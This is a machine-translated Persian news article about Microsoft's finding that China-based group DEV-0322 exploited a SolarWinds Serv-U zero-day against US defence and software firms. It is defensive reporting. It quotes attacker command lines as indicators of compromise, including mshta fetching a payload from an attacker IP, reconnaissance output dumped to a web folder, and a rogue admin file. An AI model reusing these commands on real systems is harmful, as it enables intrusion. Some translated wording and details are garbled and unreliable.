خبر

  • تک بورد - مایکروسافت می گوید هکرها در چین از SolarWinds مهم 0 روزه بهره برداری کردند

    مایکروسافت می گوید هکرها در چین از SolarWinds مهم 0 روزه بهره برداری کردند
    22 روز و 6 ساعت قبل

    هکرهایی که با عنوان DEV-0322 شناخته می شوند علاقه زیادی به پیمانکاران دفاعی و سازندگان نرم افزار دارند.
    مایکروسافت روز سه شنبه گفت هکرهایی که در چین کار می کنند از یک آسیب پذیری روز صفر در یک محصول SolarWinds سو explo استفاده می کنند. به گفته مایکروسافت ، به احتمال زیاد هکرها شرکت های نرم افزاری و صنایع دفاعی ایالات متحده را هدف قرار داده اند.

    بیشتر بخوانید مایکروسافت SolarWinds را در روز صفر و در معرض حمله فعال کشف می کند SolarWinds روز صفر را پس از دریافت اخطار از مایکروسافت مبنی بر کشف یک آسیب پذیری قبلاً ناشناخته در سری محصولات SolarWinds Serv-U ، اعلام کرد بهره برداری فعال SolarWinds مستقر در آستین ، تگزاس هیچ جزئیاتی در مورد عامل تهدید در پشت حملات و یا نحوه عملکرد حمله آنها ارائه نداد. VPN های تجاری و روترهای مصرف کننده در معرض خطر

    روز سه شنبه ، مایکروسافت گفت که در حال حاضر گروه هک را به عنوان "DEV-0322" معرفی می کند. "DEV" به "گروه توسعه" تحت مطالعه قبل از زمانی که محققان مایکروسافت از منشا یا هویت بازیگر پشت یک عملیات اطمینان دارند ، گفته می شود. این شرکت گفت که مهاجمان از نظر فیزیکی در چین واقع شده اند و اغلب به بات نت هایی متشکل از روترها یا انواع دیگر دستگاه های اینترنت اشیا تکیه می کنند.

    "MSTIC مشاهده کرده است DEV-0322 نهادهایی را در بخش پایگاه صنعتی دفاعی ایالات متحده هدف قرار می دهد. و شرکتهای نرم افزاری ، "محققان مرکز اطلاعات تهدید مایکروسافت در پستی نوشتند. "این گروه فعالیت در چین مستقر است و با استفاده از راه حل های VPN تجاری و روترهای مصرف کننده به خطر افتاده در زیرساخت های مهاجمان خود مشاهده شده است." که مردم می توانند برای تعیین اینکه آیا هک شده اند استفاده کنند. شاخص های سازش عبارتند از:

    98 [.] 176 [.] 196 [.] 89 68 [.] 235 [.] 178 [.] 32 208 [.] 113 [.] 35 [.] 58 144 [.] 34 [.] 179 [.] 162 97 [.] 77 [.] 97 [.] 58 hxxp: // 144 [.] 34 [.] 179 [.] 162 / a C: Windows Temp Serv-U.bat C: Windows Temp test current.dmp وجود خطاهای استثنایی مشکوک ، به ویژه در پرونده ورود به سیستم DebugSocketlog.txt C: Windows System32 mshta.exe http: // 144 [. ] 34 [.] 179 [.] 162 / a (defanged) cmd.exe / c whoami> "./Client/Common/redacted.txt" cmd.exe / c dir> ". Client Common redacted.txt "cmd.exe / c" C: Windows Temp Serv-U.bat "powerhell.exe C: Windows Temp Serv-U.bat cmd.exe / c نوع \ redacted redacted.Archive>" C: ProgramData RhinoSoft Serv-U Users Global Users redacted.Archive ”تبلیغات

    پست روز سه شنبه همچنین جزئیات فنی جدیدی را در مورد حمله ارائه داد. به طور خاص:

    ما مشاهده کردیم که DEV-0322 خروجی دستورات cmd.exe آنها را به پرونده های موجود در پوشه Serv-U Client Common که به طور پیش فرض از اینترنت قابل دسترسی است ، لوله می کند تا مهاجمان می تواند نتایج دستورات را بازیابی کند. همچنین با ایجاد دستی یک پرونده .Archive ساخته شده در فهرست کاربران جهانی ، این بازیگر همچنین با اضافه کردن کاربر جهانی جدید به Serv-U ، خود را به عنوان مدیر Serv-U اضافه کرد. اطلاعات کاربر Serv-U در این پرونده ها ذخیره می شود. بایگانی.

    با توجه به نحوه نوشتن کد DEV-0322 ، هنگامی که بهره برداری با موفقیت روند Serv-U را به خطر می اندازد ، یک استثنا ایجاد می شود و به سیستم وارد می شود یک پرونده ورود به سیستم Serv-U ، DebugSocketLog.txt. این فرایند همچنین می تواند پس از اجرای یک دستور مخرب خراب شود.

    با بررسی دور سنجی ، ما ویژگی های بهره برداری را شناسایی کردیم ، اما یک آسیب پذیری ریشه ای نیست. MSTIC با تیم تحقیقات امنیت تهاجمی مایکروسافت کار کرد ، که تحقیق درباره آسیب پذیری روی باینری Serv-U را انجام داد و آسیب پذیری را از طریق تجزیه و تحلیل جعبه سیاه شناسایی کرد. پس از یافتن دلیل اصلی ، این آسیب پذیری را به SolarWinds گزارش دادیم ، وی سریعاً برای فهمیدن این مسئله و ایجاد وصله ای پاسخ داد.

    آسیب پذیری روز صفر که به عنوان CVE-2021-35211 دنبال می شود ، وجود دارد در محصول Serv-U SolarWinds ، که مشتریان از آن برای انتقال پرونده ها از طریق شبکه استفاده می کنند. هنگامی که Serv-U SSH در معرض اینترنت قرار می گیرد ، این سو استفاده ها به مهاجمین امکان اجرای کد مخرب از راه دور با امتیازات بالای سیستم را می دهند. از آنجا ، مهاجمان می توانند محموله های مخرب را نصب و اجرا کنند ، یا می توانند داده ها را مشاهده و تغییر دهند.

    SolarWinds یک شب در اواخر دسامبر به یک نام خانوادگی تبدیل شد ، زمانی که محققان کشف کردند این مرکز در حمله یک حمله زنجیره ای با جهانی است رسیدن. مهاجمان پس از به خطر انداختن سیستم ساخت نرم افزار SolarWinds ، از دسترسی خود برای ایجاد یک به روزرسانی مخرب برای تقریباً 18000 مشتری از ابزار مدیریت شبکه Orion شرکت استفاده کردند.

    از این 18000 مشتری ، حدود 9 نفر در سازمان های دولتی ایالات متحده و حدود 100 نفر از آنها در صنعت خصوصی بدافزار پیگیری دریافت کردند. دولت فدرال این حملات را به سرویس اطلاعات خارجی روسیه نسبت داده است که مخفف آن SVR است. بیش از یک دهه است که SVR کمپین های بدافزاری را با هدف هدف قرار دادن دولت ها ، اندیشکده های سیاسی و سازمان های دیگر در سراسر جهان انجام داده است.

    حملات روز صفر که مایکروسافت کشف و گزارش کرد ارتباطی با زنجیره تأمین جبار ندارد. حمله.

    SolarWinds این آسیب پذیری را در آخر هفته اصلاح کرد. هر کسی که نسخه آسیب پذیر Serv-U را اجرا می کند ، باید فوراً به روز شود و علائم سازش را بررسی کند.





خبرهای دیگر از اسباب